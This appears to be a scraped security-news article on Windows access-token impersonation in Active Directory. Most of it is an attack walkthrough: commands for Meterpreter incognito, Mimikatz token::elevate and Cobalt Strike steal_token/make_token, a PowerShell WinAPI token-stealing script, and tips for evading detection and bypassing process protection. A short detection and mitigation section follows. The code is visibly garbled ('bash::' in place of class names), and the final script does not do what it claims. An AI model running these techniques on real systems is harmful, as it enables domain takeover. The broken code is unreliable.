Listen to this Post
Introduction:
In modern Active Directory (AD) environments, compromising a single endpoint with local admin rights is often just the beginning. Token impersonation is a stealthy post-exploitation technique that allows attackers to assume the identity of any logged-on user—including Domain Admins—by stealing access tokens already present in system memory, without ever touching LSASS or dumping password hashes. This article dives deep into token-based lateral movement across Meterpreter, Mimikatz, and Cobalt Strike, then arms defenders with detection and hardening strategies to block these attacks.
Learning Objectives:
- Understand the difference between primary and impersonation tokens and how Windows assigns them to processes and threads.
- Execute token impersonation attacks using three industry-standard frameworks (Metasploit, Mimikatz, Cobalt Strike) with verified commands.
- Implement effective mitigations including privilege restriction, process monitoring, and event log analysis to detect token theft.
You Should Know:
- Windows Access Tokens: The Keys Floating in Memory
Every Windows process runs with an access token that defines its security context (user, groups, privileges). Primary tokens are bound to processes; impersonation tokens are attached to threads, allowing a thread to act as another user. When a privileged account (e.g., a Domain Admin) leaves an interactive logon session or a service running, its token remains cached—ripe for theft. Attackers with SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (often held by LOCAL SERVICE, NETWORK SERVICE, or administrators) can capture these tokens.
Step‑by‑step guide to enumerate your current privileges (Windows command):
bash
whoami /priv
[/bash]
Look for SeImpersonatePrivilege and SeDebugPrivilege. If present, you can impersonate any token on the system. To list all active logon sessions and their associated tokens (requires admin):
bash
query user
[/bash]
For deeper inspection, use Sysinternals Process Explorer: right-click a process → Properties → Security tab to view its token groups.
- Technique 1: Meterpreter & Incognito – The Classic Token Hunter
Metasploit’s incognito extension remains a reliable token manipulation tool. After gaining a Meterpreter session with admin privileges, follow these steps:
Step‑by‑step guide:
bash
Load incognito
load incognito
List available tokens (only delegation tokens, -u for users)
list_tokens -u
Impersonate a discovered high-value token (e.g., Domain Admin)
impersonate_token “CORP\jdoe_da”
Verify identity
getuid
Spawn a new process with stolen token (optional)
shell
Revert to original token
drop_token
[/bash]
If you see “NT AUTHORITY\SYSTEM” in the list, you can impersonate it to gain full control. To hunt for tokens across the entire domain, combine with `kiwi` extension to dump credentials from memory after token elevation. A common pitfall: tokens are volatile—if the target user logs off, the token disappears. Use `ps` to list processes and look for those running under privileged accounts, then migrate to that process (migrate <PID>) to inherit its token directly.
- Technique 2: Mimikatz – Token Manipulation Beyond Credential Dumping
While Mimikatz is famous for sekurlsa::logonpasswords, its token module offers unparalleled control. You must first run Mimikatz with administrative rights and enable debug privilege.
Step‑by‑step guide:
bash
Elevate to debug
privilege::debug
List all tokens currently in memory
token::list
Elevate to SYSTEM by stealing a SYSTEM token
token::elevate
Automatic Domain Admin token hunt and impersonation
token::elevate /domainadmin
After impersonation, launch a new process
misc::cmd
[/bash]
For manual targeting, note the token ID from token::list, then use `token::run` with the ID. If `token::elevate /domainadmin` fails, the environment may lack an active DA token—consider forcing a logon via SMB or scheduled task. To clean up, use token::revert. Defenders often scan for Mimikatz command-line arguments; obfuscate by using PowerShell to load Mimikatz in memory (e.g., Invoke-Mimikatz). Example PowerShell-based token elevation (using Reflection):
bash
$m = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes(“C:\path\to\mimikatz.exe”))
bash::main(“privilege::debug token::elevate /domainadmin exit”)
[/bash]
- Technique 3: Cobalt Strike Beacon – Native Token Primitives
Cobalt Strike’s Beacon integrates token manipulation without external tools. The `steal_token` command takes a process ID (PID) of a running process under the target user. First, enumerate processes with ps.
Step‑by‑step guide:
bash
List processes and find PID of explorer.exe running as Domain Admin
ps
Steal token from that PID
steal_token 1234
Verify current user
getuid
Execute commands under stolen context
shell whoami
Revert to original token
rev2self
[/bash]
If you have credentials (hash or password), `make_token` creates a new token without needing an existing process:
bash
make_token CORP\administrator Password123!
[/bash]
Use `jump` commands (e.g., psexec) after `steal_token` to move laterally using the stolen identity. For persistence, consider `mimikatz token::elevate` inside Beacon’s execute-assembly. Note that `steal_token` fails if the target process is protected (e.g., PPL). In such cases, use `mimikatz` with `!+` to bypass protection.
- Advanced Manual Token Impersonation with PowerShell and WinAPI
For custom tooling or when frameworks are blocked, you can invoke token manipulation via Windows API calls using PowerShell. The following script replicates `steal_token` functionality:
Step‑by‑step guide (run as admin):
bash
Add-Type @”
using System;
using System.Runtime.InteropServices;
public class TokenMan {
[DllImport(“advapi32.dll”, SetLastError=true)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport(“kernel32.dll”, SetLastError=true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport(“advapi32.dll”, SetLastError=true)]
public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);
[DllImport(“advapi32.dll”, SetLastError=true)]
public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);
}
“@
Get PID of target process (e.g., 1234)
$pid = 1234
$hProcess = bash::OpenProcess(0x1F0FFF, $false, $pid)
$hToken = 0
bash::OpenProcessToken($hProcess, 0x2, bash$hToken)
$hDupToken = 0
bash::DuplicateTokenEx($hToken, 0x2, bash::Zero, 2, 1, bash$hDupToken)
Now run commands under stolen identity
Start-Process -FilePath “cmd.exe” -LoadUserProfile -Credential ([System.Management.Automation.PSCredential]::Empty)
[/bash]
This manually duplicates an impersonation token and applies it to the current thread. Use `whoami` in the new process to confirm. To revert, restart PowerShell.
6. Detection & Mitigation: Shutting Down Token Theft
Defenders must assume token impersonation attempts will occur. The primary mitigation is enforcing the Tiered Administrative Model: Domain Admins should only log onto Domain Controllers or dedicated Privileged Access Workstations (PAWs), never onto standard user workstations. Additionally, restrict SeImpersonatePrivilege and SeDebugPrivilege via Group Policy—only grant them to trusted service accounts.
Step‑by‑step detection guide (Windows Event Logs & Sysmon):
- Enable Sysmon (Event ID 10 – ProcessAccess) to monitor `OpenProcess` calls with `PROCESS_ALL_ACCESS` (0x1F0FFF) from suspicious binaries like mimikatz.exe or powershell.exe.
- Look for Event ID 4672 (Special Logon) assigned to anonymous logon sessions after token impersonation.
- Monitor Event ID 4648 (Logon with explicit credentials) when `make_token` or similar is used.
- Deploy Windows Defender Credential Guard to isolate LSASS and prevent token extraction.
- Use PowerShell logging (ScriptBlock Logging) to catch inline token manipulation scripts.
To hunt for active token impersonation, run the following on a suspected compromised host:
bash
Get-WinEvent -FilterHashtable @{LogName=’Security’; ID=4672} | Where-Object {$_.Message -like “SeImpersonatePrivilege”}
[/bash]
For Linux-based attackers pivoting into Windows via PSExec, monitor network logons (Event ID 4624) with Logon Type 3 (Network) and unusual token elevations.
What Undercode Say:
- Token impersonation is a silent killer in AD environments—bypassing both EDR’s credential dumping alerts and password policies. Defenders must prioritize privilege reduction over detection alone.
- The most effective defense is not a tool but a policy: Domain Admins must never leave tokens behind on low-trust hosts. Even with perfect detection, if a DA logs into a workstation, the token is already compromised.
Prediction:
As Microsoft pushes Credential Guard and TPM-based isolation, classic token theft from LSASS will become harder. Attackers will shift to abusing legitimate cloud-based tokens (e.g., Azure AD Primary Refresh Tokens) and B2B collaboration tokens, moving impersonation from on-prem memory to OAuth caches. Red teams will soon combine token impersonation with Graph API token reuse, blurring the line between AD and Entra ID attacks. Defenders must extend the Tiered Model to cloud service principals—or risk the ghost moving from the domain to the tenant.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Zlatanh Mastering – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
